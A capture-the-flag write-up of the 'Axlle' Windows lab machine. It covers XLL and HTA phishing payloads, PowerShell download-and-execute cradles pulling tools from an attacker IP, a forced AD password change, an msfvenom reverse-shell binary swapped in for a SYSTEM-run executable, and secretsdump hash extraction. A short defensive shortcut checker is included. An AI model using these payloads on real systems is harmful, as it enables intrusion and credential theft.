Basic Information

Port Scan

25, 80, and the other usual domain ports:

```text
$ nmap -sC -sV 10.10.11.21
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-24 13:28 CST
Nmap scan report for 10.10.11.21
Host is up (0.087s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-24 05:22:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: AXLLE
| NetBIOS_Domain_Name: AXLLE
| NetBIOS_Computer_Name: MAINFRAME
| DNS_Domain_Name: axlle.htb
| DNS_Computer_Name: MAINFRAME.axlle.htb
| DNS_Tree_Name: axlle.htb
| Product_Version: 10.0.20348
|_ System_Time: 2024-06-24T05:22:36+00:00
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Not valid before: 2024-05-19T11:25:03
|_Not valid after: 2024-11-18T11:25:03
|_ssl-date: 2024-06-24T05:23:15+00:00; -6m55s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -6m55s, deviation: 0s, median: -6m55s
| smb2-time:
| date: 2024-06-24T05:22:39
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.97 seconds
```

80

A software company's website, currently showing a maintenance page. It says that any problems should be reported by email in Excel format, and that macros have been disabled:

XLL to gideon.hamill

Given the page text and the open SMTP port, the route is a phishing email. Since macros are disabled, this scenario (and the machine name as a hint) points to an XLL:

Compile the XLL and send the phishing email:

```shell
x86_64-w64-mingw32-gcc -fPIC -shared -o xll.xll xll.c -luser32

swaks --to accounts@axlle.htb --from miao@miao.com --body "Miao" --header "Subject: Miaomiao" --attach @xll.xll --server 10.10.11.21
```

After sending, wait for it to be opened and executed, which gives a shell as gideon.hamill:

xll.c

```c
#include <windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

void __cdecl xlAutoOpen() {
    WinExec("powershell -e JABjAGxxxxxxAKAApAA==", 1);
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved
) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

HTA to dallon.matrix

Routine enumeration turns up an email in hMailServer which mentions that any web shortcuts placed in C:\inetpub\testing will be opened automatically:

HTA

An HTA works here: the URL shortcut redirects to the HTA, and the HTA runs the code:

```shell
powershell -exec bypass -c "wget http://10.10.14.13:7777/shell.url -O shell.url"

~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao .
```

This lands a shell as dallon.matrix:

shell.url

```ini
[InternetShortcut]
URL=file://10.10.14.13/miao/shell.hta
```

shell.hta

```html
<html>
<head>
  <script language="jscript">
    var c = "powershell -e JABjAXXXXXXXKAApAA==";
    new ActiveXObject('WScript.Shell').Run(c);
  </script>
</head>
<body>
  <script>self.close();</script>
</body>
</html>
```
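The chain above hinges on a shortcut whose target is a remote file:// share holding an HTA. As an added example that is not part of the original writeup, the following Python check parses the InternetShortcut format and flags targets that leave the web (non-http scheme, UNC path, raw IP host, script or executable extension), which is the kind of gate a defender would put in front of an auto-open directory such as C:\inetpub\testing. The sample shortcut text is constructed.

```python
from urllib.parse import urlparse
import ipaddress

SAFE_SCHEMES = {"http", "https"}
RISKY_EXTS = (".hta", ".js", ".vbs", ".wsf", ".ps1", ".bat", ".cmd", ".exe", ".dll", ".xll", ".lnk")

def parse_url_file(text):
    """Return the URL= value under [InternetShortcut], or None if absent."""
    section = None
    for raw in text.lstrip("\ufeff").splitlines():  # tolerate a BOM and CRLF
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "url":
                return value.strip()
    return None

def assess_target(url):
    """Return reasons the target is suspicious; an empty list means it looks benign."""
    if url is None:
        return ["no URL= entry"]
    reasons = []
    if url.startswith("\\\\"):  # \\host\share\file form
        reasons.append("UNC path")
        host, path = url.lstrip("\\").split("\\", 1)[0], url
    else:
        p = urlparse(url)
        if p.scheme.lower() not in SAFE_SCHEMES:
            reasons.append(f"non-web scheme {p.scheme or '<none>'}")
        host, path = p.hostname or "", p.path
    if path.lower().endswith(RISKY_EXTS):
        reasons.append("script/executable target")
    try:
        ipaddress.ip_address(host)  # hostnames and "" raise ValueError
        reasons.append("raw IP host")
    except ValueError:
        pass
    return reasons

def scan_shortcut(text):
    """Parse one .url file's contents and return (target, reasons)."""
    url = parse_url_file(text)
    return url, assess_target(url)

SAMPLE = "[InternetShortcut]\r\nURL=file://10.10.14.13/miao/shell.hta\r\n"  # constructed sample
```

Run `scan_shortcut` over each `.url` file in the directory; anything with a non-empty reason list should be quarantined rather than opened.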

user flag

On the dallon.matrix user's desktop:

Information

BloodHound analysis:

```powershell
IEX ((new-object net.webclient).downloadstring('http://10.10.14.13:7778/adPEAS.ps1'))
invoke-adpeas

copy axlle.htb_20240623225644_BloodHound.zip \\10.10.14.13\miao
```

dallon.matrix is in the WEB DAVS group, which can force-change the passwords of JACOB.GREENY and BAZ.HUMPHRIES:

Both users are members of the Remote Management group, so changing either one is enough:

JACOB.GREENY

Change JACOB.GREENY's password and log in:

```powershell
IEX ((new-object net.webclient).downloadstring('http://10.10.14.13:7778/PowerView.ps1'))

$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
```

```shell
evil-winrm -i 10.10.11.21 -u Jacob.Greeny -p 'Password123!'
```

App Devs

Jacob.Greeny is also a member of the App Devs group, and earlier we saw the App Development directory in the root of C:.

The readme mentions that standalonerunner.exe is run automatically as SYSTEM:

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

And our App Devs group has write permission on it:

standalonerunner.exe to root

The intended path here is presumably a LOLBAS technique, but the unintended route is to simply replace standalonerunner.exe and wait for it to be run:

Unintended: replace the binary

```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f exe -o miao.exe

wget http://10.10.14.13:7777/miao.exe -o standalonerunner.exe
```

root flag

```shell
evil-winrm -i 10.10.11.21 -u Administrator -p 'Xj!#$12KlMn'
```

hashdump

```shell
# meterpreter creds_all
Administrator axlle.htb Xj!#$12KlMn

# Jacob.Greeny's password was changed earlier, so reset it before dumping
~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -just-dc-ntlm Administrator:'Xj!#$12KlMn'@10.10.11.21
```


References